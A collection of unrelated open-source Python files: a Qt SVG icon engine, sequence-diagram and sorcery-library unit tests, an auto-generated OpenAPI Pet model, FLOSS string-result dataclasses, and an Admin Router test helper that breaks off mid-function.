>>> label.setPixmap(icon.colored('#0934e2', opacity=0.7).pixmap(300, 300))
>>> label.show()
# Create colored icon using theme
>>> label = QLabel()
>>> icon = QColoredSVGIcon.from_resources('new_points')
>>> label.setPixmap(icon.colored(theme='light').pixmap(300, 300))
>>> label.show()
"""
def __init__(
self,
path_or_xml: str,
color: Optional[str] = None,
opacity: float = 1.0,
) -> None:
from ...resources import get_colorized_svg
self._svg = path_or_xml
colorized = get_colorized_svg(path_or_xml, color, opacity)
super().__init__(SVGBufferIconEngine(colorized))
@lru_cache()
def colored(
self,
color: Optional[str] = None,
opacity: float = 1.0,
theme: Optional[str] = None,
theme_key: str = 'icon',
) -> 'QColoredSVGIcon':
"""Return a new colorized QIcon instance.
Parameters
----------
color : str, optional
A valid CSS color string, used to colorize the SVG. If provided,
will take precedence over ``theme``, by default None.
opacity : float, optional
Fill opacity for the icon (0-1). By default 1 (opaque).
theme : str, optional
Name of the theme to from which to get `theme_key` color.
``color`` argument takes precedence.
theme_key : str, optional
If using a theme, key in the theme dict to use, by default 'icon'
Returns
-------
QColoredSVGIcon
A pre-colored QColoredSVGIcon (which may still be recolored)
"""
if not color and theme:
from ...utils.theme import get_theme
color = getattr(get_theme(theme, False), theme_key)
return QColoredSVGIcon(self._svg, color, opacity)
@staticmethod
@lru_cache()
def from_resources(
icon_name: str,
) -> 'QColoredSVGIcon':
"""Get an icon from napari SVG resources.
Parameters
----------
icon_name : str
The name of the icon svg to load (just the stem). Must be in the
napari icons folder.
Returns
-------
QColoredSVGIcon
A colorizeable QIcon
"""
from ...resources import get_icon_path
path = get_icon_path(icon_name)
return QColoredSVGIcon(path)
class SVGBufferIconEngine(QIconEngine):
"""A custom QIconEngine that can render an SVG buffer.
An icon engine provides the rendering functions for a ``QIcon``.
Each icon has a corresponding icon engine that is responsible for drawing
the icon with a requested size, mode and state. While the built-in
QIconEngine is capable of rendering SVG files, it's not able to receive the
raw XML string from memory.
This ``QIconEngine`` takes in SVG data as a raw xml string or bytes.
see: https://doc.qt.io/qt-5/qiconengine.html
"""
def __init__(self, xml: Union[str, bytes]) -> None:
if isinstance(xml, str):
xml = xml.encode('utf-8')
self.data = QByteArray(xml)
super().__init__()
def paint(self, painter: QPainter, rect, mode, state):
"""Paint the icon int ``rect`` using ``painter``."""
renderer = QSvgRenderer(self.data)
renderer.render(painter, QRectF(rect))
def clone(self):
"""Required to subclass abstract QIconEngine."""
return SVGBufferIconEngine(self.data)
def pixmap(self, size, mode, state):
"""Return the icon as a pixmap with requested size, mode, and state."""
img = QImage(size, QImage.Format_ARGB32)
img.fill(Qt.transparent)
pixmap = QPixmap.fromImage(img, Qt.NoFormatConversion)
painter = QPainter(pixmap)
self.paint(painter, QRect(QPoint(0, 0), size), mode, state)
return pixmap
|
tests/test_sd.py
|
pinetr2e/napkin
| 190 |
129573
|
import pytest
from napkin import sd
from napkin import sd_action
class TestParams:
def test_empty(self):
assert "" == str(sd.Params(tuple(), dict()))
def test_args(self):
assert "abc, def" == str(sd.Params(('abc', 'def'), dict()))
def test_args_kargs(self):
assert "abc, foo=1" == str(sd.Params(('abc',),
dict(foo=1)))
class TestBase(object):
def check(self, context, exp_actions):
actions = context._sequence
# This is for better debugging
assert str(actions) == str(exp_actions)
assert actions == exp_actions
class TestTopLevel(TestBase):
def test_call(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
bar.func()
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.ImplicitReturn(),
])
def test_call_twice(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
bar.func()
bar.func2()
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.ImplicitReturn(),
sd_action.Call(foo, bar, 'func2', sd.Params()),
sd_action.ImplicitReturn(),
])
def test_call_with_return(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
bar.func().ret('val')
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.Return(sd.Params(('val',))),
])
def test_call_with_return_twice(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
bar.func().ret('val')
bar.func2().ret('val2')
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.Return(sd.Params(('val',))),
sd_action.Call(foo, bar, 'func2', sd.Params()),
sd_action.Return(sd.Params(('val2',))),
])
def test_fail_when_separate_return_called(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
bar.func()
with pytest.raises(sd.CallError):
c.ret()
def test_fail_when_top_level_caller_set_twice(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
bar.func()
with pytest.raises(sd.TopLevelCallerError):
with foo:
bar.func()
def test_noop_when_do_nothing_in_top_level_caller(self):
c = sd.Context()
foo = c.object('foo')
with foo:
pass
self.check(c, [
])
class TestSecondLevel(TestBase):
def test_call(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
baz = c.object('baz')
with foo:
with bar.func():
baz.func2()
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.Call(bar, baz, 'func2', sd.Params()),
sd_action.ImplicitReturn(),
sd_action.ImplicitReturn(),
])
def test_call_twice(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
baz = c.object('baz')
with foo:
with bar.func():
baz.func2()
baz.func3()
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.Call(bar, baz, 'func2', sd.Params()),
sd_action.ImplicitReturn(),
sd_action.Call(bar, baz, 'func3', sd.Params()),
sd_action.ImplicitReturn(),
sd_action.ImplicitReturn(),
])
def test_call_with_return(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
baz = c.object('baz')
with foo:
with bar.func():
baz.func2().ret()
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.Call(bar, baz, 'func2', sd.Params()),
sd_action.Return(sd.Params()),
sd_action.ImplicitReturn(),
])
def test_return_from_outside_func(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
baz = c.object('baz')
with foo:
with bar.func():
baz.func2()
c.ret()
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.Call(bar, baz, 'func2', sd.Params()),
sd_action.ImplicitReturn(),
sd_action.Return(sd.Params()),
])
def test_fail_when_call_after_returning_from_outside_func(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
baz = c.object('baz')
with foo:
with bar.func():
baz.func2()
c.ret()
with pytest.raises(sd.CallError):
baz.func3()
def test_fail_when_return_again_from_outside_func(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
baz = c.object('baz')
with foo:
with bar.func():
baz.func2()
c.ret()
with pytest.raises(sd.ReturnError):
c.ret()
def test_return_from_outside_func_without_calling_any(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
with bar.func():
c.ret()
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.Return(sd.Params()),
])
def test_do_nothing_in_outside_func(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
with bar.func():
pass
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.ImplicitReturn(),
])
class TestCreate(TestBase):
def test_simple(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
c.create(bar)
self.check(c, [
sd_action.Call(foo, bar, '<<create>>', sd.Params(), flags='c'),
sd_action.ImplicitReturn(),
])
def test_non_default_method(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
c.create(bar.new())
self.check(c, [
sd_action.Call(foo, bar, 'new', sd.Params(), flags='c'),
sd_action.ImplicitReturn(),
])
def test_constructor_params(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
c.create(bar.new('a', name='bar'))
self.check(c, [
sd_action.Call(foo, bar, 'new',
params=sd.Params(('a',), dict(name='bar')),
flags='c'),
sd_action.ImplicitReturn(),
])
def test_call_others_in_constructor(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
baz = c.object('baz')
with foo:
with c.create(bar):
baz.func()
self.check(c, [
sd_action.Call(foo, bar, '<<create>>', sd.Params(), flags='c'),
sd_action.Call(bar, baz, 'func', sd.Params()),
sd_action.ImplicitReturn(),
sd_action.ImplicitReturn(),
])
def test_fail_if_called_at_top_level(self):
c = sd.Context()
with pytest.raises(sd.CreateError):
bar = c.object('bar')
c.create(bar)
def test_fail_if_create_object_already_being_used(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
bar.func()
with pytest.raises(sd.CreateError):
c.create(bar)
def test_fail_if_create_object_twice(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
c.create(bar)
with pytest.raises(sd.CreateError):
c.create(bar)
class TestDestroy(TestBase):
def test_simple(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
bar.func()
c.destroy(bar)
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.ImplicitReturn(),
sd_action.Call(foo, bar, '<<destroy>>', sd.Params(), flags='d'),
sd_action.ImplicitReturn(),
])
def test_fail_when_call_destroyed_object(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
c.destroy(bar)
with pytest.raises(sd.CallError):
bar.func()
def test_call_other_methods_of_the_same_object_from_destructr(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
with c.destroy(bar):
bar.func()
def test_fail_when_destroy_twice_the_same_object(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
c.destroy(bar)
with pytest.raises(sd.CallError):
c.destroy(bar)
def test_fail_if_called_at_top_level(self):
c = sd.Context()
foo = c.object('foo')
with pytest.raises(sd.DestroyError):
c.destroy(foo)
class TestNote(TestBase):
def test_over_object_implicit(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
c.note('blah')
bar.func()
self.check(c, [
sd_action.Note('blah', obj=foo),
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.ImplicitReturn(),
])
def test_over_object_explicit(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
foo.note('blah')
bar.note('blah2')
bar.func()
self.check(c, [
sd_action.Note('blah', obj=foo),
sd_action.Note('blah2', obj=bar),
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.ImplicitReturn(),
])
def test_call_specific(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
baz = c.object('baz')
with foo:
bar.func().note('callee side note')
baz.func().note(caller='caller side note',
callee='callee side note')
baz.func2().note('note').ret('val')
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params(),
notes=['callee side note', None]),
sd_action.ImplicitReturn(),
sd_action.Call(foo, baz, 'func', sd.Params(),
notes=['callee side note', 'caller side note']),
sd_action.ImplicitReturn(),
sd_action.Call(foo, baz, 'func2', sd.Params(),
notes=['note', None]),
sd_action.Return(sd.Params(('val',))),
])
class TestOutside(TestBase):
def test_fail_as_callee(self):
c = sd.Context()
foo = c.object('foo')
outside = c.outside()
with foo:
with pytest.raises(sd.CallError,
match='Cannot be invoked to the outside'):
outside.func()
|
goldsberry/sportvu/__init__.py
|
motraor3/py-Goldsberry
| 268 |
129582
|
<reponame>motraor3/py-Goldsberry<filename>goldsberry/sportvu/__init__.py
from goldsberry.sportvu._SportVu2 import *
|
samples/server/petstore/python-blueplanet/app/openapi_server/models/pet.py
|
MalcolmScoffable/openapi-generator
| 11,868 |
129611
|
<gh_stars>1000+
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from app.openapi_server.models.base_model_ import Model
from app.openapi_server.models.category import Category # noqa: F401,E501
from app.openapi_server.models.tag import Tag # noqa: F401,E501
from openapi_server import util
class Pet(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, id: int=None, category: Category=None, name: str=None, photo_urls: List[str]=None, tags: List[Tag]=None, status: str=None): # noqa: E501
"""Pet - a model defined in Swagger
:param id: The id of this Pet. # noqa: E501
:type id: int
:param category: The category of this Pet. # noqa: E501
:type category: Category
:param name: The name of this Pet. # noqa: E501
:type name: str
:param photo_urls: The photo_urls of this Pet. # noqa: E501
:type photo_urls: List[str]
:param tags: The tags of this Pet. # noqa: E501
:type tags: List[Tag]
:param status: The status of this Pet. # noqa: E501
:type status: str
"""
self.swagger_types = {
'id': int,
'category': Category,
'name': str,
'photo_urls': List[str],
'tags': List[Tag],
'status': str
}
self.attribute_map = {
'id': 'id',
'category': 'category',
'name': 'name',
'photo_urls': 'photoUrls',
'tags': 'tags',
'status': 'status'
}
self._id = id
self._category = category
self._name = name
self._photo_urls = photo_urls
self._tags = tags
self._status = status
@classmethod
def from_dict(cls, dikt) -> 'Pet':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The Pet of this Pet. # noqa: E501
:rtype: Pet
"""
return util.deserialize_model(dikt, cls)
@property
def id(self) -> int:
"""Gets the id of this Pet.
:return: The id of this Pet.
:rtype: int
"""
return self._id
@id.setter
def id(self, id: int):
"""Sets the id of this Pet.
:param id: The id of this Pet.
:type id: int
"""
self._id = id
@property
def category(self) -> Category:
"""Gets the category of this Pet.
:return: The category of this Pet.
:rtype: Category
"""
return self._category
@category.setter
def category(self, category: Category):
"""Sets the category of this Pet.
:param category: The category of this Pet.
:type category: Category
"""
self._category = category
@property
def name(self) -> str:
"""Gets the name of this Pet.
:return: The name of this Pet.
:rtype: str
"""
return self._name
@name.setter
def name(self, name: str):
"""Sets the name of this Pet.
:param name: The name of this Pet.
:type name: str
"""
if name is None:
raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
self._name = name
@property
def photo_urls(self) -> List[str]:
"""Gets the photo_urls of this Pet.
:return: The photo_urls of this Pet.
:rtype: List[str]
"""
return self._photo_urls
@photo_urls.setter
def photo_urls(self, photo_urls: List[str]):
"""Sets the photo_urls of this Pet.
:param photo_urls: The photo_urls of this Pet.
:type photo_urls: List[str]
"""
if photo_urls is None:
raise ValueError("Invalid value for `photo_urls`, must not be `None`") # noqa: E501
self._photo_urls = photo_urls
@property
def tags(self) -> List[Tag]:
"""Gets the tags of this Pet.
:return: The tags of this Pet.
:rtype: List[Tag]
"""
return self._tags
@tags.setter
def tags(self, tags: List[Tag]):
"""Sets the tags of this Pet.
:param tags: The tags of this Pet.
:type tags: List[Tag]
"""
self._tags = tags
@property
def status(self) -> str:
"""Gets the status of this Pet.
pet status in the store # noqa: E501
:return: The status of this Pet.
:rtype: str
"""
return self._status
@status.setter
def status(self, status: str):
"""Sets the status of this Pet.
pet status in the store # noqa: E501
:param status: The status of this Pet.
:type status: str
"""
allowed_values = ["available", "pending", "sold"] # noqa: E501
if status not in allowed_values:
raise ValueError(
"Invalid value for `status` ({0}), must be one of {1}"
.format(status, allowed_values)
)
self._status = status
|
floss/results.py
|
mr-tz/flare-floss
| 2,067 |
129622
|
import datetime
from enum import Enum
from typing import Dict, List
from dataclasses import field
# we use pydantic for dataclasses so that we can
# easily load and validate JSON reports.
#
# pydantic checks all the JSON fields look as they should
# while using the nice and familiar dataclass syntax.
#
# really, you should just pretend we're using stock dataclasses.
from pydantic.dataclasses import dataclass
@dataclass(frozen=True)
class StackString:
"""
here's what the following members represent:
[smaller addresses]
+---------------+ <- stack_pointer (top of stack)
| | \
+---------------+ | offset
| | /
+---------------+
| "abc" | \
+---------------+ |
| | |
+---------------+ | frame_offset
| | |
+---------------+ |
| | /
+---------------+ <- original_stack_pointer (bottom of stack, probably bp)
[bigger addresses]
Attributes:
function: the address of the function from which the stackstring was extracted
string: the extracted string
program_counter: the program counter at the moment the string was extracted
stack_pointer: the stack counter at the moment the string was extracted
original_stack_pointer: the initial stack counter when the function was entered
offset: the offset into the stack from at which the stack string was found
frame_offset: the offset from the function frame at which the stack string was found
"""
function: int
string: str
program_counter: int
stack_pointer: int
original_stack_pointer: int
offset: int
frame_offset: int
class AddressType(str, Enum):
STACK = "STACK"
GLOBAL = "GLOBAL"
HEAP = "HEAP"
@dataclass(frozen=True)
class DecodedString:
"""
A decoding string and details about where it was found.
Attributes:
address: address of the string in memory
address_type: type of the address of the string in memory
string: the decoded string
decoded_at: the address at which the decoding routine is called
decoding_routine: the address of the decoding routine
"""
address: int
address_type: AddressType
string: str
decoded_at: int
decoding_routine: int
class StringEncoding(str, Enum):
ASCII = "ASCII"
UTF16LE = "UTF-16LE"
@dataclass(frozen=True)
class StaticString:
"""
A string extracted from the raw bytes of the input.
Attributes:
string: the string
offset: the offset into the input where the string is found
encoding: the string encoding, like ASCII or unicode
"""
string: str
offset: int
encoding: StringEncoding
@dataclass
class Metadata:
file_path: str
imagebase: int = 0
date: datetime.datetime = datetime.datetime.now()
analysis: Dict[str, Dict] = field(default_factory=dict)
enable_stack_strings: bool = True
enable_decoded_strings: bool = True
enable_static_strings: bool = True
@dataclass
class Strings:
stack_strings: List[StackString] = field(default_factory=list)
decoded_strings: List[DecodedString] = field(default_factory=list)
static_strings: List[StaticString] = field(default_factory=list)
@dataclass
class ResultDocument:
metadata: Metadata
strings: Strings = field(default_factory=Strings)
@classmethod
def parse_file(cls, path):
return cls.__pydantic_model__.parse_file(path)
|
tests.py
|
alexmojaki/sorcery
| 322 |
129623
|
import ast
import sqlite3
import sys
import traceback
import unittest
from io import StringIO
from time import sleep
from unittest import mock
from littleutils import SimpleNamespace, only
import sorcery as spells
from sorcery import unpack_keys, unpack_attrs, print_args, magic_kwargs, maybe, args_with_source, spell
from sorcery.spells import PYPY
class MyListWrapper(object):
def __init__(self, lst):
self.list = lst
def _make_new_wrapper(self, method_name, *args, **kwargs):
method = getattr(self.list, method_name)
new_list = method(*args, **kwargs)
return type(self)(new_list)
append, extend, clear, __repr__, __str__, __eq__, __hash__, \
__contains__, __len__, remove, insert, pop, index, count, \
sort, __iter__, reverse, __iadd__ = spells.delegate_to_attr('list')
copy, __add__, __radd__, __mul__, __rmul__ = spells.call_with_name(_make_new_wrapper)
class Foo(object):
@magic_kwargs
def bar(self, **kwargs):
return set(kwargs.items()) | {self}
@magic_kwargs
def magic_only_kwarg(n, *, y):
return n, y
class TestStuff(unittest.TestCase):
def test_unpack_keys_basic(self):
obj = SimpleNamespace(thing=SimpleNamespace())
d = dict(foo=1, bar=3, spam=7, baz=8, x=9)
out = {}
foo, obj.thing.spam, obj.bar, out['baz'] = unpack_keys(d)
self.assertEqual(foo, d['foo'])
self.assertEqual(obj.bar, d['bar'])
self.assertEqual(obj.thing.spam, d['spam'])
self.assertEqual(out, {'baz': d['baz']})
def test_unpack_keys_for_loop(self):
results = []
for x, y in unpack_keys([
dict(x=1, y=2),
dict(x=3, z=4),
dict(a=5, y=6),
dict(b=7, c=8),
], default=999):
results.append((x, y))
self.assertEqual(results, [
(1, 2),
(3, 999),
(999, 6),
(999, 999),
])
def test_unpack_keys_list_comprehension(self):
self.assertEqual(
[(y, x) for x, y in unpack_keys([
dict(x=1, y=2),
dict(x=3, y=4),
])],
[
(2, 1),
(4, 3),
])
def test_unpack_keys_bigger_expression(self):
x, y = map(int, unpack_keys(dict(x='1', y='2')))
self.assertEqual(x, 1)
self.assertEqual(y, 2)
def test_unpack_keys_skip_single_assigned_name(self):
x, y = [int(v) for v in unpack_keys(dict(x='1', y='2'))]
self.assertEqual(x, 1)
self.assertEqual(y, 2)
def test_unpack_keys_extras(self):
env = dict(DATABASE_USERNAME='me',
DATABASE_PASSWORD='<PASSWORD>')
username, password = unpack_keys(env, prefix='DATABASE_', swapcase=True)
self.assertEqual(username, 'me')
self.assertEqual(password, '<PASSWORD>')
def test_unpack_attrs(self):
obj = SimpleNamespace(aa='bv', bb='cc', cc='aa')
cc, bb, aa = unpack_attrs(obj)
self.assertEqual(aa, obj.aa)
self.assertEqual(bb, obj.bb)
self.assertEqual(cc, obj.cc)
d, e = unpack_attrs(obj, default=9)
assert d == e == 9
def test_print_args(self):
out = StringIO()
x = 3
y = 4
print_args(x + y,
x * y,
x -
y, file=out)
self.assertEqual('''\
x + y =
7
x * y =
12
x -
y =
-1
''', out.getvalue())
def test_dict_of(self):
a = 1
obj = SimpleNamespace(b=2)
self.assertEqual(spells.dict_of(
a, obj.b,
c=3, d=4
), dict(
a=a, b=obj.b,
c=3, d=4))
def test_no_starargs_in_dict_of(self):
args = [1, 2]
with self.assertRaises(TypeError):
spells.dict_of(*args)
def test_delegation(self):
lst = MyListWrapper([1, 2, 3])
lst.append(4)
lst.extend([1, 2])
lst = (lst + [5]).copy()
self.assertEqual(type(lst), MyListWrapper)
self.assertEqual(lst, [1, 2, 3, 4, 1, 2, 5])
def test_magic_kwargs(self):
foo = Foo()
x = 1
y = 2
w = 10
self.assertEqual(foo.bar(x, y, z=3),
{('x', x), ('y', y), ('z', 3), foo})
self.assertEqual(magic_only_kwarg(x, y), (x, y))
@magic_kwargs
def spam(n, **kwargs):
return n, kwargs
self.assertEqual(spam(x, y, z=5),
(x, dict(y=y, z=5)))
@magic_kwargs
def spam(n, m, **kwargs):
return n, m, kwargs
self.assertEqual(spam(x, w, y, z=5),
(x, w, dict(y=y, z=5)))
with self.assertRaises(TypeError):
@magic_kwargs
def _(a=1):
print(a)
with self.assertRaises(TypeError):
@magic_kwargs
def _(*a):
print(a)
def test_maybe(self):
if PYPY:
with self.assertRaises(NotImplementedError):
maybe(None)
return
n = None
assert maybe(n) is None
self.assertIsNone(maybe(n))
assert maybe(n).a.b.c()[4]().asd.asd()() is None
assert maybe(n)()()() is None
assert maybe(0) == 0
assert maybe({'a': 3})['a'] == 3
assert maybe({'a': {'b': 3}})['a']['b'] == 3
assert maybe({'a': {'b': 3}})['a']['b'] + 2 == 5
assert maybe({'a': {'b': None}})['a']['b'] is None
def test_select_from(self):
conn = sqlite3.connect(':memory:')
c = conn.cursor()
c.execute('CREATE TABLE points (x INT, y INT)')
c.execute("INSERT INTO points VALUES (5, 3), (8, 1)")
conn.commit()
assert [(3, 5), (1, 8)] == [(y, x) for y, x in spells.select_from('points')]
y = 1
x = spells.select_from('points', where=[y])
assert (x, y) == (8, 1)
def test_multiple_attr_calls(self):
x = 3
y = 5
self.assertEqual([
spells.dict_of(x),
spells.dict_of(y),
], [dict(x=x), dict(y=y)])
self.assertEqual([spells.dict_of(x), spells.dict_of(y)],
[dict(x=x), dict(y=y)])
def test_no_assignment(self):
with self.assertRaises(TypeError):
unpack_keys(dict(x=1, y=2))
def test_spell_repr(self):
self.assertRegex(repr(spells.dict_of),
r'Spell\(<function dict_of at 0x.+>\)')
def test_assigned_names(self):
x, y = ['_' + s for s in spells.assigned_names()]
self.assertEqual(x, '_x')
self.assertEqual(y, '_y')
# noinspection PyTrailingSemicolon
def test_semicolons(self):
# @formatter:off
tester(1); tester(2); tester(3)
tester(9
); tester(
8); tester(
99
); tester(33); tester([4,
5, 6, [
7]])
# @formatter:on
def test_args_with_source(self):
self.assertEqual(args_with_source(1 + 2, 3 * 4),
[("1 + 2", 3), ("3 * 4", 12)])
self.assertEqual(
args_with_source(
self.assertEqual(args_with_source(1 + 2), [("1 + 2", 3)])),
[(
'self.assertEqual(args_with_source(1 + 2), [("1 + 2", 3)])',
None,
)],
)
def test_switch(self):
result = spells.switch(2, lambda: {
1: 10,
2: 20,
1 / 0: 1 / 0
})
self.assertEqual(result, 20)
result = spells.switch(2, lambda: {
1: 10,
{{5, 2, 1 / 0}}: 20,
3: 1 / 0
})
self.assertEqual(result, 20)
with self.assertRaises(KeyError):
spells.switch(2, lambda: {
1: 10,
3: 30,
})
result = spells.switch(2, lambda: {
1: 10,
3: 30,
}, default=-1)
self.assertEqual(result, -1)
with self.assertRaises(TypeError):
spells.switch(2, {
1: 10,
2: 20,
})
with self.assertRaises(TypeError):
spells.switch(2, lambda: [{
1: 10,
2: 20,
}])
def test_timeit_in_function(self):
with self.assertRaises(ValueError):
spells.timeit()
def test_decorator(self):
@empty_decorator
@decorator_with_args(tester('123'), x=int())
@tester(list(tuple([1, 2])), returns=empty_decorator)
@tester(
list(
tuple(
[3, 4])),
returns=empty_decorator)
@empty_decorator
@decorator_with_args(
str(),
x=int())
@tester(list(tuple([5, 6])), returns=empty_decorator)
@tester(list(tuple([7, 8])), returns=empty_decorator)
@empty_decorator
@decorator_with_args(tester('sdf'), x=tester('123234'))
def foo():
pass
def test_list_comprehension(self):
str([tester(int(x)) for x in tester([1]) for _ in tester([2]) for __ in [3]])
str([[[tester(int(x)) for x in tester([1])] for _ in tester([2])] for __ in [3]])
return str([(1, [
(2, [
tester(int(x)) for x in tester([1])])
for _ in tester([2])])
for __ in [3]])
def test_lambda(self):
self.assertEqual((lambda x: (tester(x), tester(x)))(tester(3)), (3, 3))
(lambda: (lambda: tester(1))())()
self.assertEqual((lambda: [tester(x) for x in tester([1, 2])])(), [1, 2])
def test_indirect_call(self):
dict(x=tester)['x'](tester)(3)
def test_compound_statements(self):
with self.assertRaises(TypeError):
try:
for _ in tester([2]):
while tester(0):
pass
else:
tester(4)
else:
tester(5)
raise ValueError
except tester(ValueError):
tester(9)
raise TypeError
finally:
tester(10)
# PyCharm getting confused somehow?
# noinspection PyUnreachableCode
str()
with self.assertRaises(tester(Exception)):
if tester(0):
pass
elif tester(0):
pass
elif tester(1 / 0):
pass
def test_generator(self):
def gen():
for x in [1, 2]:
yield tester(x)
gen2 = (tester(x) for x in tester([1, 2]))
assert list(gen()) == list(gen2) == [1, 2]
@spell
def tester(frame_info, arg, returns=None):
result = eval(
compile(ast.Expression(only(frame_info.call.args)), '<>', 'eval'),
frame_info.frame.f_globals,
frame_info.frame.f_locals,
)
assert result == arg, (result, arg)
if returns is None:
return arg
return returns
assert tester([1, 2, 3]) == [1, 2, 3]
def empty_decorator(f):
return f
def decorator_with_args(*_, **__):
return empty_decorator
class TestTimeit(unittest.TestCase):
def patch(self, *args, **kwargs):
patcher = mock.patch(*args, **kwargs)
patcher.start()
self.addCleanup(patcher.stop)
def setUp(self):
self.patch('sorcery.spells._raise', lambda e: e)
self.patch('sys.stdout', StringIO())
def assert_usual_output(self):
self.assertRegex(
sys.stdout.getvalue(),
r"""
Number of trials: 1
Method 1: 1\.\d{3}
Method 2: 1\.\d{3}
Method 1: 1\.\d{3}
Method 2: 1\.\d{3}
Best times:
-----------
Method 1: 1\.\d{3}
Method 2: 1\.\d{3}
""".strip())
def test_no_result(self):
if spells.timeit(repeat=2):
sleep(1)
else:
sleep(1.1)
self.assert_usual_output()
# noinspection PyUnusedLocal
def test_matching_result(self):
if spells.timeit(repeat=2):
sleep(1)
result = 3
else:
sleep(1.1)
result = 3
self.assert_usual_output()
# noinspection PyUnusedLocal
def test_not_matching_result(self):
with self.assertRaises(AssertionError):
if spells.timeit():
result = 3
else:
result = 4
def test_exception(self):
try:
if spells.timeit():
print(1 / 0)
else:
pass
except ZeroDivisionError:
traceback.print_exc(file=sys.stdout)
stdout = sys.stdout.getvalue()
self.assertIn('<timeit-src>', stdout)
self.assertIn('1 / 0', stdout)
if __name__ == '__main__':
unittest.main()
|
packages/adminrouter/extra/src/test-harness/modules/generic_test_code/common.py
|
makkes/dcos
| 2,577 |
129638
|
<filename>packages/adminrouter/extra/src/test-harness/modules/generic_test_code/common.py
# Copyright (C) Mesosphere, Inc. See LICENSE file for details.
import copy
import logging
import os
from contextlib import contextmanager
from http import cookies
from urllib.parse import urljoin
import requests
from mocker.endpoints.mesos import AGENT1_ID
from util import LineBufferFilter
log = logging.getLogger(__name__)
def ping_mesos_agent(ar,
auth_header,
endpoint_id='http://127.0.0.2:15001',
expect_status=200,
agent_id=AGENT1_ID,
timeout=60,
):
"""Test if agent is reachable or not
Helper function meant to simplify checking mesos agent reachability/mesos
agent related testing.
Arguments:
ar: Admin Router object, an instance of runner.(ee|open).Nginx
auth_header (dict): headers dict that contains DC/OS authentication
token. The auth data it contains is invalid.
expect_status (int): HTTP status to expect
endpoint_id (str): if expect_status==200 - id of the endpoint that
should respoind to the request
agent_id (str): id of the agent to ping
"""
url = ar.make_url_from_path('/agent/{}/blah/blah'.format(agent_id))
resp = requests.get(url,
allow_redirects=False,
headers=auth_header,
timeout=timeout)
assert resp.status_code == expect_status
if expect_status == 200:
req_data = resp.json()
assert req_data['endpoint_id'] == endpoint_id
def generic_no_slash_redirect_test(ar, path, code=301, headers=None):
"""Test if request for location without trailing slash is redirected
Helper function meant to simplify writing multiple tests testing the
same thing for different endpoints.
Arguments:
ar: Admin Router object, an instance of runner.(ee|open).Nginx
path (str): path for which request should be made
code (int): expected http redirect code
headers (dict): dictionary containing the headers to send
to the tested AR instance.
"""
url = ar.make_url_from_path(path)
r = requests.get(url, allow_redirects=False, headers=headers)
assert r.status_code == code
# Redirect has trailing slash added and can be absolute or relative
absolute = urljoin(url, r.headers['Location'])
assert absolute == url + '/'
def generic_verify_response_test(
ar,
headers,
path,
assert_headers=None,
assert_headers_absent=None,
assert_status=200):
"""Test if response sent by AR is correct
Helper function meant to simplify writing multiple tests testing the
same thing for different endpoints.
Arguments:
ar: Admin Router object, an instance of runner.(ee|open).Nginx
headers (dict): dictionary containing the headers to send
to the tested AR instance.
path (str): path for which request should be made
assert_headers (dict): additional headers to test where key is the
asserted header name and value is expected value
assert_headers_absent (dict): headers that *MUST NOT* be present in the
upstream request
assert_status (int): expected http status of the reponse
"""
url = ar.make_url_from_path(path)
resp = requests.get(url,
allow_redirects=False,
headers=headers)
assert resp.status_code == assert_status
if assert_headers is not None:
for name, value in assert_headers.items():
verify_header(resp.headers.items(), name, value)
if assert_headers_absent is not None:
for name in assert_headers_absent:
